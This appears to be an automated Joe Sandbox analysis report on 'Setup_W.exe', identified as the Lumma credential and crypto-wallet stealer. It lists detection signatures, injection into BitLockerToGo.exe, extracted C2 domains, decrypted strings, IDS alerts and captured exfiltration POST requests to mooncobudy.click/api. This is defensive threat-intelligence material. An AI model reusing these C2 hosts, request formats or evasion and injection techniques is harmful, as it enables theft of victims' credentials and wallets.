Edit tour

Windows Analysis Report
Setup_W.exe

Overview

General Information

Sample name:	Setup_W.exe
Analysis ID:	1580153
MD5:	bcb408aad4a09a615ecaab20c8016c3b
SHA1:	5b6885e46d0ee42bc1ff8f3c503c95d72e7b2882
SHA256:	d53658877443a27b1e4e5abfdf79717493343f21b824db045d5bfff67302465c
Tags:	exeuser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to get notified if a device is plugged in / out

Contains functionality to modify clipboard data

Contains functionality to read the clipboard data

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Installs a global mouse hook

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains more sections than normal

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Setup_W.exe (PID: 7304 cmdline: "C:\Users\user\Desktop\Setup_W.exe" MD5: BCB408AAD4A09A615ECAAB20C8016C3B)

BitLockerToGo.exe (PID: 7680 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["aspecteirs.lat", "necklacebudi.lat", "crosshuaht.lat", "sustainskelet.lat", "rapeflowwj.lat", "grannyejh.lat", "discokeyus.lat", "energyaffai.lat", "mooncobudy.click"], "Build id": "Jwquln--2112YT"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000003.2145451743.00000000032DB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2014689557.000000000A100000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000004.00000003.2145593469.00000000032DD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 7680	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 7680	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 1 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T02:56:35.575963+0100	2028371	3	Unknown Traffic	192.168.2.4	49736	104.21.44.57	443	TCP
2024-12-24T02:56:37.836660+0100	2028371	3	Unknown Traffic	192.168.2.4	49737	104.21.44.57	443	TCP
2024-12-24T02:56:40.466376+0100	2028371	3	Unknown Traffic	192.168.2.4	49738	104.21.44.57	443	TCP
2024-12-24T02:56:43.149298+0100	2028371	3	Unknown Traffic	192.168.2.4	49739	104.21.44.57	443	TCP
2024-12-24T02:56:45.506207+0100	2028371	3	Unknown Traffic	192.168.2.4	49740	104.21.44.57	443	TCP
2024-12-24T02:56:48.609961+0100	2028371	3	Unknown Traffic	192.168.2.4	49741	104.21.44.57	443	TCP
2024-12-24T02:56:51.052897+0100	2028371	3	Unknown Traffic	192.168.2.4	49742	104.21.44.57	443	TCP
2024-12-24T02:57:01.995879+0100	2028371	3	Unknown Traffic	192.168.2.4	49749	104.21.44.57	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T02:56:36.609310+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49736	104.21.44.57	443	TCP
2024-12-24T02:56:38.875868+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49737	104.21.44.57	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T02:56:36.609310+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49736	104.21.44.57	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T02:56:38.875868+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49737	104.21.44.57	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T02:56:44.090669+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49739	104.21.44.57	443	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T02:56:51.065678+0100	2843864	1	A Network Trojan was detected	192.168.2.4	49742	104.21.44.57	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Setup_W.exe

Avira: detected

Found malware configuration

Source: 0.2.Setup_W.exe.9e84000.1.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["aspecteirs.lat", "necklacebudi.lat", "crosshuaht.lat", "sustainskelet.lat", "rapeflowwj.lat", "grannyejh.lat", "discokeyus.lat", "energyaffai.lat", "mooncobudy.click"], "Build id": "Jwquln--2112YT"}

Multi AV Scanner detection for submitted file

Source: Setup_W.exe	Virustotal: Detection: 64%			Perma Link
Source: Setup_W.exe	ReversingLabs: Detection: 47%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for sample

Source: Setup_W.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: rapeflowwj.lat
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: crosshuaht.lat
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: sustainskelet.lat
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: aspecteirs.lat
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: energyaffai.lat
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: necklacebudi.lat
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: discokeyus.lat
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: grannyejh.lat
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: mooncobudy.click
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: rapeflowwj.lat
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: crosshuaht.lat
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: sustainskelet.lat
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: aspecteirs.lat
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: energyaffai.lat
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: necklacebudi.lat
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: discokeyus.lat
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: grannyejh.lat
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: mooncobudy.click
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: rapeflowwj.lat
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: crosshuaht.lat
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: sustainskelet.lat
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: aspecteirs.lat
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: energyaffai.lat
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: necklacebudi.lat
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: discokeyus.lat
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: grannyejh.lat
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: mooncobudy.click
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: rapeflowwj.lat
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: crosshuaht.lat
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: sustainskelet.lat
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: aspecteirs.lat
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: energyaffai.lat
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: necklacebudi.lat
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: discokeyus.lat
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: grannyejh.lat
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: mooncobudy.click
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Jwquln--2112YT

Source: Setup_W.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED

Source: unknown	HTTPS traffic detected: 104.21.44.57:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.44.57:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.44.57:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.44.57:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.44.57:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.44.57:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.44.57:443 -> 192.168.2.4:49742 version: TLS 1.2

Source: Setup_W.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Setup_W.exe

Code function: 0_2_64608848 SystemParametersInfoW,KiUserCallbackDispatcher,SystemParametersInfoW,LoadLibraryA,SystemParametersInfoW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetProcessDpiAwarenessContext,SetProcessDPIAware,GetModuleHandleW,CreateWindowExW,ShowWindow,RegisterDeviceNotificationW,PeekMessageW,TranslateMessage,DispatchMessageW,

0_2_64608848

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49736 -> 104.21.44.57:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 104.21.44.57:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49737 -> 104.21.44.57:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 104.21.44.57:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49739 -> 104.21.44.57:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49742 -> 104.21.44.57:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: aspecteirs.lat
Source: Malware configuration extractor	URLs: necklacebudi.lat
Source: Malware configuration extractor	URLs: crosshuaht.lat
Source: Malware configuration extractor	URLs: sustainskelet.lat
Source: Malware configuration extractor	URLs: rapeflowwj.lat
Source: Malware configuration extractor	URLs: grannyejh.lat
Source: Malware configuration extractor	URLs: discokeyus.lat
Source: Malware configuration extractor	URLs: energyaffai.lat
Source: Malware configuration extractor	URLs: mooncobudy.click

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.44.57:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.44.57:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.44.57:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.44.57:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.44.57:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49749 -> 104.21.44.57:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.44.57:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.44.57:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mooncobudy.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 48Host: mooncobudy.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DGI840PD1ZFG7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18134Host: mooncobudy.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FCOPZD72NDC4GNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8761Host: mooncobudy.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QV6QGZ1BC3OZLY6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20420Host: mooncobudy.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5QWPGMFUQQGVWBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1238Host: mooncobudy.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3HOQIICSEP9NRXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 551433Host: mooncobudy.click

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: mooncobudy.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mooncobudy.click

Source: BitLockerToGo.exe, 00000004.00000003.2113869497.0000000005577000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: BitLockerToGo.exe, 00000004.00000003.2113869497.0000000005577000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: BitLockerToGo.exe, 00000004.00000003.2145451743.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063212917.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2169738032.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063270598.0000000003299000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292404891.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2145610434.0000000003299000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292604362.00000000032D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: BitLockerToGo.exe, 00000004.00000003.2113869497.0000000005577000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: BitLockerToGo.exe, 00000004.00000003.2113869497.0000000005577000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: BitLockerToGo.exe, 00000004.00000003.2113869497.0000000005577000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: BitLockerToGo.exe, 00000004.00000003.2113869497.0000000005577000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: BitLockerToGo.exe, 00000004.00000003.2113869497.0000000005577000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: BitLockerToGo.exe, 00000004.00000003.2113869497.0000000005577000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: BitLockerToGo.exe, 00000004.00000003.2113869497.0000000005577000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: BitLockerToGo.exe, 00000004.00000003.2113869497.0000000005577000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: BitLockerToGo.exe, 00000004.00000003.2113869497.0000000005577000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: BitLockerToGo.exe, 00000004.00000003.2064014887.000000000559A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063864587.000000000559C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: BitLockerToGo.exe, 00000004.00000003.2115142915.0000000005551000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: BitLockerToGo.exe, 00000004.00000003.2064014887.000000000559A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063864587.000000000559C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: BitLockerToGo.exe, 00000004.00000003.2064014887.000000000559A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063864587.000000000559C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: BitLockerToGo.exe, 00000004.00000003.2064014887.000000000559A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063864587.000000000559C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: BitLockerToGo.exe, 00000004.00000003.2115142915.0000000005551000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: BitLockerToGo.exe, 00000004.00000003.2064014887.000000000559A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063864587.000000000559C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BitLockerToGo.exe, 00000004.00000003.2064014887.000000000559A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063864587.000000000559C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BitLockerToGo.exe, 00000004.00000003.2064014887.000000000559A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063864587.000000000559C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: BitLockerToGo.exe, 00000004.00000003.2115142915.0000000005551000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: BitLockerToGo.exe, 00000004.00000003.2292404891.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2293085450.0000000003299000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2145537455.0000000003261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mooncobudy.click/
Source: BitLockerToGo.exe, 00000004.00000003.2063212917.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063270598.0000000003299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mooncobudy.click/);
Source: BitLockerToGo.exe, 00000004.00000002.2293779528.000000000329A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292724484.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292404891.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2293085450.0000000003299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mooncobudy.click/I:
Source: BitLockerToGo.exe, 00000004.00000003.2063212917.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2293872061.00000000032FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2293855753.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063270598.0000000003299000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292404891.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2169597412.00000000032E1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2182980470.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292943982.00000000032FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mooncobudy.click/api
Source: BitLockerToGo.exe, 00000004.00000002.2293687502.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292724484.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292404891.0000000003286000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mooncobudy.click/api/
